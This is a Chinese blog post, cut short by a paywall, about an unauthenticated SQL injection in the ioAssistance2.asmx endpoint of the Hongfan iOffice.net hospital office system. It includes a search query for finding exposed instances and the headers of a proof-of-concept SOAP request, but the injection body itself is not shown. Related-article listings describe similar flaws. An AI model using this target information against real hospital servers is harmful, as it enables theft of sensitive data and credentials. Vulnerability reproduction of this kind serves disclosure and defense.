红帆ioffice ioassistance2.asmx sql注入

已于 2024-03-10 18:19:50 修改
阅读量57 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-10 18:19:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136606066
版权

产品简介

红帆iOffice.net从最早满足医院行政办公需求(传统 OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。

漏洞概述

红帆iOffice.net、ioassistance2.asmx接囗处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

网络测绘

app = “红帆-ioffice”

漏洞POC

POST /ioffice/prg/set/wss/ioAssistance2.asmx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 373
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/GetLoginedEmpNoReadedInf"
Accept-Encoding: gzip, deflate

<?xml version="1.0" encoding="utf
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
红帆OA udfmr.asmx SQL注入漏洞复现
0xSec
08-18 3475
红帆iOffice.netudfmr.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞
Keepb1ue的博客
03-06 580
红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。
红帆iOffice ioDesktopData.asmx接口存在SQL注入漏洞 附POC软件
nnn2188185的博客
03-04 202
红帆iOffice ioDesktopData.asmx接口存在SQL注入漏洞 附POC软件
0day 红帆ioffice存在SQL注入漏洞
weixin_43167326的博客
04-15 350
红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。
【漏洞复现】SQL注入漏洞
zkaqlaoniao的博客
11-09 516
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。平台list接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。此漏洞是由于部分用户站点下web.config的Debug的值设置为1,导致系统存在SQL注入漏洞,只需让相关系统站点下web.config的Debug值设为0即可。
红帆OA 多处 SQL注入漏洞复现
0xSec
03-04 776
红帆iOffice.netioDesktopData.asmx、wssRtSyn.asmx、GetWorkUnit.asmx、udfGetDocStep.asmx等接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
【漏洞复现】红帆-ioffice-ioDesktopData-sql注入
知黑而守白
03-05 95
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。红帆HFOffice ioDesktopData 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
实战 | 攻防演练中某市医院的SQL注入
weixin_54787877的博客
05-25 1354
前言 这次演习中打算搞一手医院。 虽然漏洞已上报,但还是会打码。 攻击手法: SQL注入攻击 瓶颈难点: 1.主站 1.sqlmap无法读取数据表 2.无法使用os-shell来getshell 3.网站找不到绝对路径,sql-shell没法写shell 2.医院综合查询系统 有DBA权限但是不能os-shell。 网站找不到绝对路径,sql-shell没法写shell 大家有好思路可以评论一起交流一下哈。 实战过程 1.日常目测一波: 看到搜索框来试试SQL注入和XSS 输入个“单引号”直接中奖,真
红帆OA-ioFileDown接口任意文件读取和CAWS.asmx、udfGetDocStep、wssRtFile接口SQL注入
weixin_43567873的博客
03-10 83
红帆OA-ioFileDown接口任意文件读取和CAWS.asmx、udfGetDocStep、wssRtFile接口SQL注入
红帆OA(医疗版)漏洞细节未授权SQL注入请求注入数据包
05-06
红帆OA(医疗版)是**一款专为医疗机构设计的办公自动化软件,旨在提高医院...需要注意的是,尽管红帆OA(医疗版)提供了强大的功能和广泛的应用场景,但任何软件系统都可能存在一定的安全风险,例如SQL注入漏洞等。因
红帆OA用户培训.pptx
09-21
红帆OA用户培训是关于iOffice.net信息管理平台的应用培训,该平台旨在提高员工技能和企业智商,实现信息及时、准确、有效地传递。该平台拥有多样化的沟通方式,包括手机短信、即时消息、通知公告、传阅信息、人员...
品管部红帆圈QCC资料.pptx
09-23
品管部红帆圈QCC资料.pptx
通达信指标公式源码 红帆黑马副图指标.doc
07-30
通达信指标公式源码红帆黑马副图指标 通达信指标公式源码红帆黑马副图指标是基于通达信指标公式语言编写的一组技术指标,旨在帮助投资者和交易员进行股票市场分析和预测。该指标系统包括多个组件,包括_BGTYU、...
【软件分享】红帆IE助手
02-18
来源:http://oa.gy3y.com/ioffice/Login.aspx?ReturnUrl=%2fiOffice%2fiOffice.aspx
【网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测,实时检测,深度学习【二】
q742971636的博客
06-12 507
以通过 Alt+F2 然后输入 xterm 尝试打开xterm。这之后就可以用Ctrl+Alt+T打开新终端了。在之前的代码中,已经捕获到攻击流量并打印。
2024中国网络安全产品用户调查报告(发布版)
2301_76786857的博客
06-12 699
本报告正是安在新媒体发起,基于“诸子云社群,以“取之于民,用之于民"的方式,反馈“甲方"眼中的中国网络安全市场情况,为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境受到重大影响。
车载网络安全指南 概述(一)
最新发布
qq_42357877的博客
06-12 261
汽车电子系统网络安全指南给出汽车电子系统网络安全活动框架,以及在此框架下的汽车电子系统网络安全活动、组织管理和支持保障等方面的建议。汽车电子系统网络安全指南适用于指导整车厂、零部件供应商、软件供应商、芯片供应商以及各种服务提供商等汽车电子供应链上各组织机构开展网络安全活动,指导相关人员在从事汽车电子系统的设计开发、生产、运行和服务等过程中满足基本的网络安全需求。
【网络安全】网络安全基础精讲 - 网络安全入门第一篇
goldfish8848的博客
06-11 1250
网络安全基础知识
uni-app 微信小程序分享
07-27
uni-app提供了内置的微信分享API,可以通过调用相关方法来实现微信小程序的分享功能。首先,在onLoad方法中使用wx.showShareMenu方法,设置menus将发送给朋友和分享到朋友圈两个按钮都可以点击。具体代码如下: ```javascript onLoad() { wx.showShareMenu({ withShareTicket: true, menus: \["shareAppMessage", "shareTimeline"\] }) } ``` 接下来,需要分别编写发送给朋友和分享到朋友圈的方法。这两个方法应该与data和methods等同级,不要写到methods里面。具体代码如下: ```javascript onShareAppMessage(res) { if (res.from === 'button') { console.log(res.target) } return { title: 'title', path: '/pages/hfdt/gztjh', mpId: 'wx6bf107b87c455b99' } }, onShareTimeline(res) { return { title: '胶南街道召开“红帆支部”观摩学习暨工作推进会', type: 0, summary: "" } } ``` 在onShareAppMessage方法中,可以设置分享的标题、路径和微信小程序的AppId。在onShareTimeline方法中,可以设置分享到朋友圈的标题和类型等信息。通过以上步骤,就可以实现uni-app微信小程序的分享功能。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [uniapp 微信分享](https://blog.csdn.net/lxgyydsgod/article/details/126234984)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [uniapp微信小程序使用分享功能](https://blog.csdn.net/qq_43080548/article/details/125619531)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值